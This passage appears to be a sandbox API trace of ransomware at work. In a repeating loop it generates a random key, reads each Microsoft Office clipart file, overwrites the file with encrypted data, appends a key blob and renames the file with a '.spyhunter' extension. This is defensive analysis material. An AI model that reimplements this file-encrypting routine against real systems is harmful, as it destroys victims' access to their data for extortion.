[0098.527] GetProcessHeap () returned 0x2c0000 [0098.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c2af78 | out: hHeap=0x2c0000) returned 1 [0098.528] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbb8 | out: pbBuffer=0x25cfbb8) returned 1 [0098.528] GetProcessHeap () returned 0x2c0000 [0098.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.528] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbb0*=0x30) returned 1 [0098.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187893.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.529] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF") returned 67 [0098.529] StrStrW (lpFirst="J0187893.WMF", lpSrch=".txt") returned 0x0 [0098.529] GetProcessHeap () returned 0x2c0000 [0098.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0098.529] ReadFile (in: hFile=0x174, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb74*=0x15f4, lpOverlapped=0x0) returned 1 [0098.537] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffea0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.537] WriteFile (in: hFile=0x174, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x15f4, lpNumberOfBytesWritten=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb74*=0x15f4, lpOverlapped=0x0) returned 1 [0098.537] GetProcessHeap () returned 0x2c0000 [0098.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0098.537] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.537] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x25cfbb4*, lpNumberOfBytesWritten=0x25cfb74*=0x4, lpOverlapped=0x0) returned 1 [0098.537] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb74*=0x30, lpOverlapped=0x0) returned 1 [0098.538] CloseHandle (hObject=0x174) returned 1 [0098.538] GetProcessHeap () returned 0x2c0000 [0098.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x394fd8 [0098.538] wnsprintfW (in: pszDest=0x394fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF.spyhunter") returned 77 [0098.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187893.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187893.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187893.wmf.spyhunter")) returned 1 [0098.539] GetProcessHeap () returned 0x2c0000 [0098.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x394fd8 | out: hHeap=0x2c0000) returned 1 [0098.539] GetProcessHeap () returned 0x2c0000 [0098.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.539] GetProcessHeap () returned 0x2c0000 [0098.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x391740 | out: hHeap=0x2c0000) returned 1 [0098.539] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbb8 | out: pbBuffer=0x25cfbb8) returned 1 [0098.539] GetProcessHeap () returned 0x2c0000 [0098.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.539] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbb0*=0x30) returned 1 [0098.539] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187881.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.539] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF") returned 67 [0098.540] StrStrW (lpFirst="J0187881.WMF", lpSrch=".txt") returned 0x0 [0098.540] GetProcessHeap () returned 0x2c0000 [0098.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0098.540] ReadFile (in: hFile=0x174, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb74*=0x1258, lpOverlapped=0x0) returned 1 [0098.550] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffeda8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.550] WriteFile (in: hFile=0x174, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1258, lpNumberOfBytesWritten=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb74*=0x1258, lpOverlapped=0x0) returned 1 [0098.551] GetProcessHeap () returned 0x2c0000 [0098.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0098.551] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.551] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x25cfbb4*, lpNumberOfBytesWritten=0x25cfb74*=0x4, lpOverlapped=0x0) returned 1 [0098.551] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb74*=0x30, lpOverlapped=0x0) returned 1 [0098.551] CloseHandle (hObject=0x174) returned 1 [0098.551] GetProcessHeap () returned 0x2c0000 [0098.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x394fd8 [0098.551] wnsprintfW (in: pszDest=0x394fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF.spyhunter") returned 77 [0098.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187881.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187881.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187881.wmf.spyhunter")) returned 1 [0098.552] GetProcessHeap () returned 0x2c0000 [0098.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x394fd8 | out: hHeap=0x2c0000) returned 1 [0098.552] GetProcessHeap () returned 0x2c0000 [0098.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.552] GetProcessHeap () returned 0x2c0000 [0098.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3915a0 | out: hHeap=0x2c0000) returned 1 [0098.552] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbb0 | out: pbBuffer=0x25cfbb0) returned 1 [0098.552] GetProcessHeap () returned 0x2c0000 [0098.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.552] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfba8*=0x30) returned 1 [0098.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188587.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.553] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF") returned 67 [0098.553] StrStrW (lpFirst="J0188587.WMF", lpSrch=".txt") returned 0x0 [0098.553] GetProcessHeap () returned 0x2c0000 [0098.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0098.553] ReadFile (in: hFile=0x174, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb6c*=0x2800, lpOverlapped=0x0) returned 1 [0098.567] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.567] WriteFile (in: hFile=0x174, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb6c*=0x2800, lpOverlapped=0x0) returned 1 [0098.568] GetProcessHeap () returned 0x2c0000 [0098.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0098.568] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.568] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbac*, lpNumberOfBytesWritten=0x25cfb6c*=0x4, lpOverlapped=0x0) returned 1 [0098.575] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb6c*=0x30, lpOverlapped=0x0) returned 1 [0098.575] CloseHandle (hObject=0x174) returned 1 [0098.575] GetProcessHeap () returned 0x2c0000 [0098.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c761b0 [0098.576] wnsprintfW (in: pszDest=0x2c761b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF.spyhunter") returned 77 [0098.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188587.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188587.wmf.spyhunter")) returned 1 [0098.580] GetProcessHeap () returned 0x2c0000 [0098.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c761b0 | out: hHeap=0x2c0000) returned 1 [0098.580] GetProcessHeap () returned 0x2c0000 [0098.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.580] GetProcessHeap () returned 0x2c0000 [0098.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x391a80 | out: hHeap=0x2c0000) returned 1 [0098.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbb0 | out: pbBuffer=0x25cfbb0) returned 1 [0098.580] GetProcessHeap () returned 0x2c0000 [0098.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.581] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfba8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfba8*=0x30) returned 1 [0098.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.714] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF") returned 67 [0098.714] StrStrW (lpFirst="PE03453_.WMF", lpSrch=".txt") returned 0x0 [0098.714] GetProcessHeap () returned 0x2c0000 [0098.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.714] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb6c*=0x1f24, lpOverlapped=0x0) returned 1 [0098.715] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffe0dc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.715] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1f24, lpNumberOfBytesWritten=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb6c*=0x1f24, lpOverlapped=0x0) returned 1 [0098.759] GetProcessHeap () returned 0x2c0000 [0098.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.759] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.759] WriteFile (in: hFile=0x170, lpBuffer=0x25cfbac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbac*, lpNumberOfBytesWritten=0x25cfb6c*=0x4, lpOverlapped=0x0) returned 1 [0098.760] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb6c*=0x30, lpOverlapped=0x0) returned 1 [0098.760] CloseHandle (hObject=0x170) returned 1 [0098.769] GetProcessHeap () returned 0x2c0000 [0098.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0098.770] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF.spyhunter") returned 77 [0098.770] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03453_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03453_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03453_.wmf.spyhunter")) returned 1 [0098.905] GetProcessHeap () returned 0x2c0000 [0098.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0098.906] GetProcessHeap () returned 0x2c0000 [0098.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.906] GetProcessHeap () returned 0x2c0000 [0098.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c743e8 | out: hHeap=0x2c0000) returned 1 [0098.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfba8 | out: pbBuffer=0x25cfba8) returned 1 [0098.906] GetProcessHeap () returned 0x2c0000 [0098.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.906] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfba0*=0x30) returned 1 [0098.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02214_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0099.080] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF") returned 80 [0099.080] StrStrW (lpFirst="WB02214_.GIF", lpSrch=".txt") returned 0x0 [0099.080] GetProcessHeap () returned 0x2c0000 [0099.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0099.080] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb64*=0x136b, lpOverlapped=0x0) returned 1 [0099.129] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffec95, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.129] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x136b, lpNumberOfBytesWritten=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb64*=0x136b, lpOverlapped=0x0) returned 1 [0099.129] GetProcessHeap () returned 0x2c0000 [0099.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0099.129] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.129] WriteFile (in: hFile=0x170, lpBuffer=0x25cfba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x25cfba4*, lpNumberOfBytesWritten=0x25cfb64*=0x4, lpOverlapped=0x0) returned 1 [0099.129] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb64*=0x30, lpOverlapped=0x0) returned 1 [0099.129] CloseHandle (hObject=0x170) returned 1 [0099.129] GetProcessHeap () returned 0x2c0000 [0099.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.129] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF.spyhunter") returned 90 [0099.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02214_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02214_.gif.spyhunter")) returned 1 [0099.130] GetProcessHeap () returned 0x2c0000 [0099.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.130] GetProcessHeap () returned 0x2c0000 [0099.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0099.130] GetProcessHeap () returned 0x2c0000 [0099.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x352e48 | out: hHeap=0x2c0000) returned 1 [0099.130] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfba8 | out: pbBuffer=0x25cfba8) returned 1 [0099.130] GetProcessHeap () returned 0x2c0000 [0099.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0099.130] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfba0*=0x30) returned 1 [0099.130] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02134_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0099.131] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF") returned 80 [0099.131] StrStrW (lpFirst="WB02134_.GIF", lpSrch=".txt") returned 0x0 [0099.131] GetProcessHeap () returned 0x2c0000 [0099.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0099.131] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb64*=0x97f, lpOverlapped=0x0) returned 1 [0099.211] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff681, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.211] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x97f, lpNumberOfBytesWritten=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb64*=0x97f, lpOverlapped=0x0) returned 1 [0099.211] GetProcessHeap () returned 0x2c0000 [0099.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0099.211] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.211] WriteFile (in: hFile=0x170, lpBuffer=0x25cfba4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x25cfba4*, lpNumberOfBytesWritten=0x25cfb64*=0x4, lpOverlapped=0x0) returned 1 [0099.211] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb64, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb64*=0x30, lpOverlapped=0x0) returned 1 [0099.211] CloseHandle (hObject=0x170) returned 1 [0099.211] GetProcessHeap () returned 0x2c0000 [0099.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0099.211] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF.spyhunter") returned 90 [0099.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02134_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02134_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02134_.gif.spyhunter")) returned 1 [0099.212] GetProcessHeap () returned 0x2c0000 [0099.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0099.212] GetProcessHeap () returned 0x2c0000 [0099.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0099.212] GetProcessHeap () returned 0x2c0000 [0099.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x352a88 | out: hHeap=0x2c0000) returned 1 [0099.212] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfba0 | out: pbBuffer=0x25cfba0) returned 1 [0099.212] GetProcessHeap () returned 0x2c0000 [0099.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0099.212] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfb98*=0x30) returned 1 [0099.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\wb02097_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0099.214] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\WB02097_.GIF") returned 80 [0099.214] StrStrW (lpFirst="WB02097_.GIF", lpSrch=".txt") returned 0x0 [0099.214] GetProcessHeap () returned 0x2c0000 [0099.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0099.214] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb5c, lpOverlapped=0x0 | 